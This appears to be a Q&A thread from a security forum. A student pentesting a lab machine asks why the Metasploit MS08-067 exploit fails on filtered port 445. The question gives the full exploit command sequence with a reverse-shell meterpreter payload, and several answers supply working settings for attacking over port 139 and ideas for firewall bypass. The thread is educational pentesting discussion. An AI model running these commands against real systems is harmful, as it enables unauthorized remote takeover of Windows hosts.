Exploiting through a filtered port

Question

I'm doing some pentesting against a machine the lecturer set up in the lab. NMAP shows port 445 to be filtered and Nessus confirms the ms08_067 vulnerability is present on that machine.

I tried running Metasploit against it the normal way:

use exlpoit/windows/smb/ms08_067_netapi
set RHOST TARGET_IP
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST MY_IP
exploit

It tells me:

[-] Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.2.2:445)

I'm guessing the exploit is failing because port 445 is filtered. The thing that has me puzzled is that Nessus can apparently check that the vulnerability is present. Since Nessus can do that through the filtered port, is there a way I can launch the exploit through a filtered port? Are there any Metasploit settings that need to be arranged?

I assume 192.168.2.2 is the TARGET_IP? – schroeder Mar 10 '14 at 20:54 — schroeder, Mar 10 '14 at 20:54

score 11 · Accepted Answer · answered Mar 10 '14 at 20:43

You have contradictory information: nmap says the port is filtered but nessus says that the vulnerability is present on the system. They cannot both be true, one of these must be wrong. Given that metasploit is unable to connect it is likely that nessus is reporting incorrectly, or is basing the vulnerability report on information gleaned from other open ports. If you look at tenable's page on that advisory you will see that nessus can test for it using port 139 or port 445, so 139 is probably open, and may be exploitable.

score 4 · Answer 2 · answered Mar 10 '14 at 21:58

tl;dr No, you won't be able to directly exploit this vulnerability through a filtered port, and it can't be detected in this way. There must be something else going on in your scenario.

Why?

If this port is coming back as filtered then a firewall or IPS is dropping packets, meaning you won't be receiving any response from the server. This flaw (MS08-067) can only be detected by Nessus if the vulnerability scanner can establish an SMB connection to this port. Nessus won't automatically be attempting to bypass the firewall in any way, but it might be doing a different kind of port scan that could wield different results.

Possible reasons for the results you are seeing:

Nessus might be detecting the vulnerability on a different port, probably NetBIOS over TCP (NBT) on TCP/139. Check the Nessus report carefully. In this case you would need to set RPORT 139 and also set SMBDirect false. The latter is an advanced option (show advanced).
Some kind of intrusion prevention is running between you and the target host (or on the target host) which is leading to inconsistent port scan results. Try running NMAP in various configurations (-sS, -sT, -p445,139 etc) to see if the results are consistent. This doesn't really explain why Nessus would be able to detect it but it not be exploitable by Metasploit though. It also seems unlikely in a lab environment, unless the lab has specifically been setup for IPS evasion.

score 3 · Answer 3 · edited Jan 09 '17 at 15:04

3

Even if the port 445 (SMB) is closed, you may sometimes be able to exploit this vulnerability through port 139 (NetBios). In metasploit, just use the following syntax:

set RPORT 139; set SMBDirect false; exploit

edited Jan 09 '17 at 15:04

Anders

64,406
24
178
215

answered Jan 09 '17 at 14:27

Ricardo Reimao

31
1

score 2 · Answer 4 · answered Mar 10 '14 at 20:31

"Filtered" usually means that no response was received from the port (as opposed to closed, which responds with RST packet - see Port Scanner on wikipedia). This usually indicates that firewall is just dropping the packets that go to that port and it is unlikely that it will be exploitable.

score 1 · Answer 5 · answered Jan 09 '15 at 14:59

1

You might be able to use the BNAT-Suite (also included in Metasploit) technique or the Nmap NSE firewallbypass technique to punch through the firewall or IP filtering mechanism.

answered Jan 09 '15 at 14:59

atdre

18,885
6
58
107

score 0 · Answer 6 · answered Mar 23 '19 at 09:59

I got the same Problem. My nmap scan on the smb-vuln-ms08-067 with ports 139 and 445 show the scanned system was vulnerable but the exploit didn't work.

set RPORT 139

and

set SMBDirect false

worked for me (Thanks to Ricardo Reimao, i wanted to comment but it didn't work)

I've tryed to set the port to 139 before but didn't know about the SMBDirect option.

I was wondering why msf didn't show me the option when typing in "show options" and found out you can show more options with the command "show advanced"

msf exploit(windows/smb/ms08_067_netapi) > show advanced

Module advanced options (exploit/windows/smb/ms08_067_netapi):

   Name                    Current Setting    Required  Description
   ----                    ---------------    --------  -----------
   ...
   SMBDirect               false              no        The target port is a raw SMB service (not NetBIOS)
   ...

Exploiting through a filtered port

6 Answers6

Linked